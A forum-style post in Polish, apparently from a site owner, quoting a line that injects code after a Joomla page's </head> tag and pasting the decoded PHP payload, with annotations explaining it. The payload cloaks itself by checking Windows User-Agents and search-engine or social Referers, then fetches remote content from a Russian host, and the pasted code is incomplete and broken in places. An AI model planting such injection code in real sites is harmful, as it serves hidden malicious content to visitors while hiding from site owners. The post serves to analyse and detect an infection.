$JResp = str_ireplace("</head>", "</head>".$code, $JResp);
Nie bawię się Joomlą na co dzień, ale taki kod od razu włącza alarm w mojej głowie – odkodowałem eval'owany kod. Wklejam go poniżej. Spotkał się już ktoś z Was z takim exploitem?
// Decoded payload as posted, with line breaks restored for reading. The paste is
// incomplete: several function bodies and conditions are missing, so it is not valid
// PHP as shown and is documented here only as far as the visible lines allow.
//
// What the visible code establishes: it acts only for requests whose User-Agent
// contains "windows", and depending on $mode also requires a known browser name
// (mode 1) or a Referer from a search engine, social site or URL shortener (mode 2).
// Other requests pass through untouched, so a plain fetch with a non-browser
// User-Agent can make an infected site look clean. When checking a site, compare
// against a request carrying a Windows browser User-Agent, and review outbound
// requests from the web server to the host named in $url.
$url = 'http://dailyfiles.ru/1.txt'; // remote resource handed to mainwork(); presumably fetched there, but the fetching code is missing from this paste
$mode = 1;// 1 or 2 (author's comment, translated from Russian); selects which gating branch below is used

// Request to our host, variant 1 (author's comment, translated from Russian).
// NOTE(review): the body is empty in this paste, so the fetch method cannot be told from here.
function geturl_1($url) { }

// Request to our host, variant 2 \ sockets (author's comment, translated from Russian).
// Only the request-header strings, a response-accumulating fragment and the return survive.
// NOTE(review): the call that writes these headers to $sock and the loop that reads $line
// are missing, so the statement below is syntactically broken as pasted.
function geturl_2( $sock,$host, $path, $query ) {
    // Headers imitate an old Firefox on Windows XP and set Referer to the target host itself.
    "Host: $host\r\n" .
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n" .
    "Accept: */*\r\n" .
    "Accept-Language: en-us,en;q=0.5\r\n" .
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" .
    "Keep-Alive: 300\r\n" .
    "Connection: keep-alive\r\n" .
    "Referer: http://$host\r\n\r\n");
    { $response .= $line; }
    return $response;
}

// Request to our host, variant 3 \ cURL (author's comment, translated from Russian).
// Fetches $url with cURL and returns the response body as a string: CURLOPT_HEADER is off,
// so response headers are not included, and CURLOPT_RETURNTRANSFER makes curl_exec() return
// the content instead of printing it. No timeout or other options are set here.
function geturl_3($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HEADER, FALSE);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}

// Returns 1 when the User-Agent contains "opera", "Firefox" or "MSIE" (case-insensitive), else 0.
// Only the "opera" test compares against false; the other two rely on truthiness, so a match
// at offset 0 counts as no match for them.
function is_good_ua($useragent) {
    if( stripos($useragent, 'opera')!==false || stripos($useragent, 'Firefox') || stripos($useragent, 'MSIE')) {
        return 1;
    }
    return 0;
}

// Returns 1 when the User-Agent contains "windows" (case-insensitive) at any offset other
// than 0, else 0. This is the outermost gate for the whole payload.
function is_windows_ua($useragent) {
    if(stripos($useragent, 'windows')) {
        return 1;
    }
    return 0;
}

// NOTE(review): only the branch skeleton survives in this paste. One branch tests whether
// curl_init() exists, so this presumably picks one of the geturl_* variants; what is done
// with the fetched content cannot be told from here.
function mainwork($url) {
    { }
    else {
        { }
        elseif( @function_exists('curl_init') ) { }
    }
}

// Entry point: read the visitor's User-Agent; "@" hides the notice when the header is absent.
$ua = @$_SERVER['HTTP_USER_AGENT'];
if(is_windows_ua($ua)) {
    if ($mode == 1) {
        // Mode 1: act for any Windows visitor whose browser name is on the is_good_ua() list.
        if (is_good_ua($ua)) {
            mainwork($url);
        }
    }
    elseif ($mode == 2) {
        // NOTE(review): the bare "{" blocks here and below look like conditions lost in the
        // paste; confirm against the original file.
        {
            // Mode 2: act only for visitors arriving from the listed search engines, social
            // sites and URL shorteners, matched against the Referer header.
            $referer = $_SERVER['HTTP_REFERER'];
            if (stristr($referer,"yahoo")
                or stristr($referer,"bing")
                or stristr($referer,"rambler")
                or stristr($referer,"gogo")
                or stristr($referer,"live.com")or stristr($referer,"aport")
                or stristr($referer,"nigma")
                or stristr($referer,"webalta")
                or stristr($referer,"begun.ru")
                or stristr($referer,"stumbleupon.com")
                or stristr($referer,"bit.ly")
                or stristr($referer,"tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
                or preg_match ("/google\.(.*?)\/url\?sa/",$referer)
                or stristr($referer,"myspace.com")
                or stristr($referer,"facebook.com")
                or stristr($referer,"aol.com")) {
                {
                    mainwork($url);
                }
            }
        }
    }
}